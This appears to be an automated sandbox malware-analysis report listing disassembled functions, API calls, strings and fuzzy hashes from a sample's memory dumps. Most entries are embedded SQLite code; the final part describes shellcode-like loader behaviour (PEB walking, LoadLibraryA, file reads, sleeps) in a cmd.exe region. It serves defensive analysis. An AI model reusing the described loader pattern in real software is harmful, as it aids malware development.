                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiVersionWide_free$_malloc$DiskFreeSpace$FullNamePath
                                                                    • String ID:
                                                                    • API String ID: 2298454362-0
                                                                    • Opcode ID: 523f6ad734f39696d714b63bc7f5a1a6f827b975d5061f73ca5f8c9efdb13dd0
                                                                    • Instruction ID: f35b2f6544baaf495a0e5f05c53a182082173851f6cfa88d16025d5918bc0600
                                                                    • Opcode Fuzzy Hash: 523f6ad734f39696d714b63bc7f5a1a6f827b975d5061f73ca5f8c9efdb13dd0
                                                                    • Instruction Fuzzy Hash: 8B41A572F002189FDB26DB64DC85BEBB7ACAB05794F1405A9E609DB180EFF05A80CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F91AA0 Relevance: 12.9, APIs: 1, Strings: 5, Instructions: 2401COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: DISTINCT$GROUP BY$ORDER BY$only a single result allowed for a SELECT that is part of an expression$too many terms in compound SELECT
                                                                    • API String ID: 2102423945-95127808
                                                                    • Opcode ID: 1f13554b825f6c805969814e472a2f7a284bc2822f5df311ec79568281c52f83
                                                                    • Instruction ID: fd0cf5224560b21aa5b370f041b545e6ecaabaa3dbda821aebb5891801f2ffbe
                                                                    • Opcode Fuzzy Hash: 1f13554b825f6c805969814e472a2f7a284bc2822f5df311ec79568281c52f83
                                                                    • Instruction Fuzzy Hash: D5236D71A047419FDB24CF18C880A6AB7F2FF89344F14896EEA8A8B351D771E945CF52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F86B50 Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 588COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: ($API call with %s database connection pointer$d$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$invalid$misuse at line %d of [%.10s]
                                                                    • API String ID: 2102423945-2789757714
                                                                    • Opcode ID: 04cb0a8ea7fcfee0fb9050c6073344c033e915b59564931191ad4318bbe48413
                                                                    • Instruction ID: 4d47df5c733158365bed1e40ba1eb86156040f55c427cc21078f942db503c513
                                                                    • Opcode Fuzzy Hash: 04cb0a8ea7fcfee0fb9050c6073344c033e915b59564931191ad4318bbe48413
                                                                    • Instruction Fuzzy Hash: A222C1B5A043019BDB24EF18D880B2AFBE9BF44788F140469FB45DB341E771E950CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F542D0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 486COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: :memory:
                                                                    • API String ID: 2102423945-2920599690
                                                                    • Opcode ID: b6d47d23cf994d8e36cdfa5a388a04ca4c80e3b508485a38c54fe5053e087314
                                                                    • Instruction ID: a6efff03b420484df10830a986e1a15a22fb543759e77542b5d601919066cdc6
                                                                    • Opcode Fuzzy Hash: b6d47d23cf994d8e36cdfa5a388a04ca4c80e3b508485a38c54fe5053e087314
                                                                    • Instruction Fuzzy Hash: 9012E9B0E002648FDB21CF28D884BAABBB5BF01388F1441A9DF599B352D775D994CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F48D90 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 208fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32 ref: 02F48E33
                                                                      • Part of subcall function 02F47760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,761B5420,02F4908D,00000000,00000000,7620F560), ref: 02F47770
                                                                      • Part of subcall function 02F47760: _malloc.LIBCMT ref: 02F4777C
                                                                      • Part of subcall function 02F47760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 02F47796
                                                                      • Part of subcall function 02F47760: _free.LIBCMT ref: 02F477A1
                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 02F48EDB
                                                                    • CreateFileW.KERNEL32(00000000,?,00000003,00000000,?,?,00000000), ref: 02F48F09
                                                                    • CreateFileA.KERNEL32(00000000,?,00000003,00000000,?,?,00000000), ref: 02F48F1C
                                                                    • GetLastError.KERNEL32 ref: 02F48F2B
                                                                    • _free.LIBCMT ref: 02F48F35
                                                                    Strings
                                                                    • cannot open file at line %d of [%.10s], xrefs: 02F48F85
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 02F48F7B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharCreateFileMultiVersionWide_free$ErrorLast_malloc
                                                                    • String ID: cannot open file at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 3782002744-850067789
                                                                    • Opcode ID: 5794b4260ab45f7b8934b71a65b552d3caa3e06837ad63ea73b541fdc1dff2bd
                                                                    • Instruction ID: bc3b2e15ae0fd6a3195e111866fdf6074a1f7cea407dc04e6d338279336e947f
                                                                    • Opcode Fuzzy Hash: 5794b4260ab45f7b8934b71a65b552d3caa3e06837ad63ea73b541fdc1dff2bd
                                                                    • Instruction Fuzzy Hash: 07719FB1A083059FD724DF69E881A5BBBE5FB88794F404A2DF559C3280DB74D904CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02FA5480 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 294COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: BINARY$MATCH$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                    • API String ID: 2102423945-2494281147
                                                                    • Opcode ID: 52e57b5b7372ffa6ea28dc80772c6a792d3378118fb8647d54917100f4cb044e
                                                                    • Instruction ID: 5e1e18b555ff3b4aa364583037e1629ac4471ca3e74e0500e1f329bca9faddbb
                                                                    • Opcode Fuzzy Hash: 52e57b5b7372ffa6ea28dc80772c6a792d3378118fb8647d54917100f4cb044e
                                                                    • Instruction Fuzzy Hash: 5CA103F1E00314ABEB219F28DCD5B977A99AF05794F480465EE0AAF342D7B5D840CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F47820 Relevance: 9.1, APIs: 6, Instructions: 79fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$File$PointerRead_memset
                                                                    • String ID:
                                                                    • API String ID: 1220473449-0
                                                                    • Opcode ID: 131a7190bc706cf2911ea70bbabb59b019d57852f2986a1597de004656ba1d45
                                                                    • Instruction ID: 309dce97972ba591d6f5a47c84602632936d93bc99a90ea7dd3f32786102d8a9
                                                                    • Opcode Fuzzy Hash: 131a7190bc706cf2911ea70bbabb59b019d57852f2986a1597de004656ba1d45
                                                                    • Instruction Fuzzy Hash: 37117872A44208ABD710DE69EC81FAAF7ACFB447B4F104656FD18C7680DB71ED5086E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F8A880 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 430COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 02F8A8B9
                                                                      • Part of subcall function 02F61120: _memset.LIBCMT ref: 02F6116B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: ($database schema is locked: %s$statement too long
                                                                    • API String ID: 2102423945-3861767200
                                                                    • Opcode ID: 204cd9216eccbc4ca0b170f1c6c011a597c46306fcab24d6001aefdd92b591c8
                                                                    • Instruction ID: 8a6945fbceb7b366056c8e8ad0054d38537f1726e8e7d635d5e52fa73ba2fe2c
                                                                    • Opcode Fuzzy Hash: 204cd9216eccbc4ca0b170f1c6c011a597c46306fcab24d6001aefdd92b591c8
                                                                    • Instruction Fuzzy Hash: 53F1C671A043019FD714EF28D880B6AF7E1FF85788F04456EEA8A9B341EB74E945CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F4E600 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 317COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: ($-journal
                                                                    • API String ID: 2102423945-1587918665
                                                                    • Opcode ID: 2cceca3d598e37e2945d65bd6f1a3cf0b47f87b35ead1d146be235cb94febbc2
                                                                    • Instruction ID: 1ffc7f6027b7006eba15b832f1ff29da7d42b34857af7b6bbe2003ada0dba411
                                                                    • Opcode Fuzzy Hash: 2cceca3d598e37e2945d65bd6f1a3cf0b47f87b35ead1d146be235cb94febbc2
                                                                    • Instruction Fuzzy Hash: 7FC1DFB1E007059BDB20CF68C880B9BBBF5BF44354F18896DDA698B381EB74E545CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F54DF0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 283COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 02F54F94
                                                                      • Part of subcall function 02F4D4E0: _memset.LIBCMT ref: 02F4D514
                                                                    Strings
                                                                    • database corruption at line %d of [%.10s], xrefs: 02F54E6B
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 02F54E61
                                                                    • SQLite format 3, xrefs: 02F54F6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: SQLite format 3$database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-3910250768
                                                                    • Opcode ID: 0507b5b02abac0472fd561ea8c86e514d735104224105a9d653cdd67d40d02fb
                                                                    • Instruction ID: 2c721bae7818637b94fd72fe119568e7f000a110039951403a3b8cb338a2c980
                                                                    • Opcode Fuzzy Hash: 0507b5b02abac0472fd561ea8c86e514d735104224105a9d653cdd67d40d02fb
                                                                    • Instruction Fuzzy Hash: 83B1BFB1A083229FD714CF28D48071ABBE1BF84394F148A5DEE998B645D771E984CFD2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F54060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 0-1231421067
                                                                    • Opcode ID: a07db6f8be67790f40c3dac147f992e95bbd690848aa14389d5d02ff2402ead6
                                                                    • Instruction ID: 9a9cc577b5878ea70efd41436739870de50a89ccad06fd51aea927f592ab298e
                                                                    • Opcode Fuzzy Hash: a07db6f8be67790f40c3dac147f992e95bbd690848aa14389d5d02ff2402ead6
                                                                    • Instruction Fuzzy Hash: 9D51C471B002209BF7219E69DC81B5677A2EF547E8F144559EF289B281DBB1E881CFD0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02FA3550 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID:
                                                                    • API String ID: 2102423945-0
                                                                    • Opcode ID: e03fe9127c9d733032cbc01fd55d734dfaa4255945131f8314c39837359b6722
                                                                    • Instruction ID: bfe07f463776b61d04e823ccf234541978b4a7f3b1c61aeb257f52bea8379434
                                                                    • Opcode Fuzzy Hash: e03fe9127c9d733032cbc01fd55d734dfaa4255945131f8314c39837359b6722
                                                                    • Instruction Fuzzy Hash: F241F8F9E8020D8FD7229B28ECD5717FAA0AB887D5F000967DA1686340EB759464CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F4D4E0 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID:
                                                                    • API String ID: 2102423945-0
                                                                    • Opcode ID: a3c7abf6de1cc2b6f8444ce611d50d7b01a5ff6300dc1c2332dba0014e64f2b7
                                                                    • Instruction ID: 27c45e9ab65aa02c37dc01c005626cceed55afc88ba615149bd80d12369629e2
                                                                    • Opcode Fuzzy Hash: a3c7abf6de1cc2b6f8444ce611d50d7b01a5ff6300dc1c2332dba0014e64f2b7
                                                                    • Instruction Fuzzy Hash: C2312BB5A047019FD324DF29D880A27B7E9FF88354F104A2EE99983750EB71E855CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02FAA982 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,02FA8532,00000000,00000001,00000000,00000000,00000000,?,02FA8157,00000001,00000214,?,02FA84E8), ref: 02FAA9C5
                                                                      • Part of subcall function 02FA6CDC: __getptd_noexit.LIBCMT ref: 02FA6CDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 328603210-0
                                                                    • Opcode ID: 089f156e33ab4ab226c4760b1dde31648cf18d050c0d7a99f319a5877a9fa4a2
                                                                    • Instruction ID: 7b6a1b76a6e7d6a8b993588579179220bb3f6865e3c372340a8d01da26e70025
                                                                    • Opcode Fuzzy Hash: 089f156e33ab4ab226c4760b1dde31648cf18d050c0d7a99f319a5877a9fa4a2
                                                                    • Instruction Fuzzy Hash: BF0128B1B0021A8FEB258E24CC74BAB33A4BF853E4F058519ED16C7180DB30D814C650
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F49970 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(02FBEC40,02F433B4,?,02FA36AD), ref: 02F499A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: 87670970420f1f20757f7346a186c8adaf821c956076a1ba9ba39f60d7d3a3ce
                                                                    • Instruction ID: 5eb53363db6914c9aa75afa5ef22663197d5674475497dff83901015e5d0bf92
                                                                    • Opcode Fuzzy Hash: 87670970420f1f20757f7346a186c8adaf821c956076a1ba9ba39f60d7d3a3ce
                                                                    • Instruction Fuzzy Hash: 54014CF5D812688FD393DF39A9D6297BAE4BB046C67440D37D906D2200EFB45424CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F4DD80 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID:
                                                                    • API String ID: 2102423945-0
                                                                    • Opcode ID: d49f724bfc57ff056881ccfc2f64776627580c3b2d968b77fb2da9cf6968aa75
                                                                    • Instruction ID: 67abe35660bcf0462e8e17c71ff324ec78093665fcbae6263359dad974552579
                                                                    • Opcode Fuzzy Hash: d49f724bfc57ff056881ccfc2f64776627580c3b2d968b77fb2da9cf6968aa75
                                                                    • Instruction Fuzzy Hash: D2F02B317402042BC630961EDC0AD6BBB6DCFC3B24F0402A5FE1C8B390E9629821C1F2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02FA7FF2 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000,02FA9841,02FBDD38,00000314,00000000,?,?,?,?,?,02FA714A,02FBDD38,Microsoft Visual C++ Runtime Library,00012010), ref: 02FA7FF4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: 86baff4715940f54cdd7af386cbac284425c0f1bbfffe06e1086ac1ef1861b27
                                                                    • Instruction ID: e2efbb10df9ee0eef41830eb783b12288d8dcbd716c7409885965b744125d944
                                                                    • Opcode Fuzzy Hash: 86baff4715940f54cdd7af386cbac284425c0f1bbfffe06e1086ac1ef1861b27
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 02F652D0 Relevance: .0, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe949f4db79c0fb07479b10b96d6eb37ab230a312b52561a4276eabf098e6e51
                                                                    • Instruction ID: 6a1c0a4f94806af071e61ed71b3c9294df00301916cd630ab32574b43f64851c
                                                                    • Opcode Fuzzy Hash: fe949f4db79c0fb07479b10b96d6eb37ab230a312b52561a4276eabf098e6e51
                                                                    • Instruction Fuzzy Hash: 95F0A070455284AFE7269B18D45CBB43B99DB0034CF8844D8D9081F262C3B7D4CAC350
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F87270 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 205COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • no entry point [%s] in shared library [%s], xrefs: 02F8737B
                                                                    • sqlite3_extension_init, xrefs: 02F872C2
                                                                    • error during initialization: %s, xrefs: 02F873D5
                                                                    • not authorized, xrefs: 02F872A1
                                                                    • unable to open shared library [%s], xrefs: 02F8730A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: error during initialization: %s$no entry point [%s] in shared library [%s]$not authorized$sqlite3_extension_init$unable to open shared library [%s]
                                                                    • API String ID: 2102423945-3409965631
                                                                    • Opcode ID: c1b7eebc57c42fb8e25cbc9235de092b7467c7f0677de5ddd4c846d79f5db5df
                                                                    • Instruction ID: 35e2f83bfa982947bd66b9fdf2298414810b90b2659726366b6b8c4113730e56
                                                                    • Opcode Fuzzy Hash: c1b7eebc57c42fb8e25cbc9235de092b7467c7f0677de5ddd4c846d79f5db5df
                                                                    • Instruction Fuzzy Hash: 2051B7767402055BE710FA69DC81BBBF7D8EF84394F144528FF48C6240EB75E9158BA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F47AA0 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 02F47AD0
                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,000001FE,00000000,?), ref: 02F47B1B
                                                                    • LockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 02F47BB6
                                                                    • GetLastError.KERNEL32 ref: 02F47BC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: FileLock$ErrorLastVersion
                                                                    • String ID:
                                                                    • API String ID: 1561719237-0
                                                                    • Opcode ID: 70fe1e08a9c53c44fd0d258a4e8bbd76c4b7debc563f258b699ac66b8745fca0
                                                                    • Instruction ID: b721fd61f8e3b56b4703558ed1703e88d78d0b3ef1ecbd99c3c96b2c46a5db68
                                                                    • Opcode Fuzzy Hash: 70fe1e08a9c53c44fd0d258a4e8bbd76c4b7debc563f258b699ac66b8745fca0
                                                                    • Instruction Fuzzy Hash: 94318571E402289FDB25DF28DC85BDBFBB4BB08785F0045AAE645D7280DB709A50CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F53A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    • Opcode ID: 27f67682b561ad5f8226aa7fd386785ec89a59eb65e1d8b58660b3ebba5d7ddd
                                                                    • Instruction ID: 3dc80a980104040f78f8aba60b492808aca92909302b05743672120af38d6db3
                                                                    • Opcode Fuzzy Hash: 27f67682b561ad5f8226aa7fd386785ec89a59eb65e1d8b58660b3ebba5d7ddd
                                                                    • Instruction Fuzzy Hash: 7E61A2206047A15BD32A8F3D88E45B4FFE19F91189B8885DDEFDB8B383D166D644C760
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02F53290 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 173COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 02F53396
                                                                      • Part of subcall function 02F4D4E0: _memset.LIBCMT ref: 02F4D514
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    • Opcode ID: b1f8be58eb0fcf975b5a5d71ff39cfa03b6ca2f54e3481152190b3e7d21fe2b5
                                                                    • Instruction ID: 3c6529b8a0bd544a1746392601ab6bc133ce49a41d2c2fc8fb4b2a06a9fc9940
                                                                    • Opcode Fuzzy Hash: b1f8be58eb0fcf975b5a5d71ff39cfa03b6ca2f54e3481152190b3e7d21fe2b5
                                                                    • Instruction Fuzzy Hash: EE510671B043208BD7219F2D8845B16B7E2AFC47E4F19859DEF998B341DBB1E806CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:59%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:30
                                                                    Total number of Limit Nodes:1
                                                                    execution_graph 82 326010e 114 326001a GetPEB 82->114 86 326001a GetPEB 87 32601a1 86->87 88 326001a GetPEB 87->88 89 32601ae 88->89 90 326001a GetPEB 89->90 91 32601bb 90->91 92 326001a GetPEB 91->92 93 32601c8 92->93 94 326001a GetPEB 93->94 95 32601d5 94->95 96 326001a GetPEB 95->96 97 32601e2 96->97 98 326001a GetPEB 97->98 99 32601ef 98->99 100 326001a GetPEB 99->100 101 32601fc 100->101 102 326001a GetPEB 101->102 103 326020b 102->103 104 326001a GetPEB 103->104 105 3260217 104->105 106 326001a GetPEB 105->106 107 3260224 CreateFileA 106->107 108 3260246 ReadFile 107->108 113 3260273 108->113 110 326028b Sleep 110->113 111 3260312 GetExitCodeProcess 111->113 112 32603a6 113->110 113->111 113->112 115 3260034 LoadLibraryA 114->115 115->86

                                                                    Callgraph

                                                                    • Executed
                                                                    • Not Executed
                                                                    • Opacity -> Relevance
                                                                    • Disassembly available
                                                                    callgraph 0 Function_03260000 1 Function_03260400 2 Function_0326010E 2->0 3 Function_0326001A 2->3

                                                                    Executed Functions

                                                                    Function 0326010E Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 248filesleeplibraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(user32.dllntdll.dll), ref: 03260195
                                                                    • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0326023C
                                                                    • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 0326026C
                                                                    • Sleep.KERNELBASE(00002EE0), ref: 03260290
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.516552772.0000000003260000.00000040.00000400.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3260000_cmd.jbxd
                                                                    Similarity
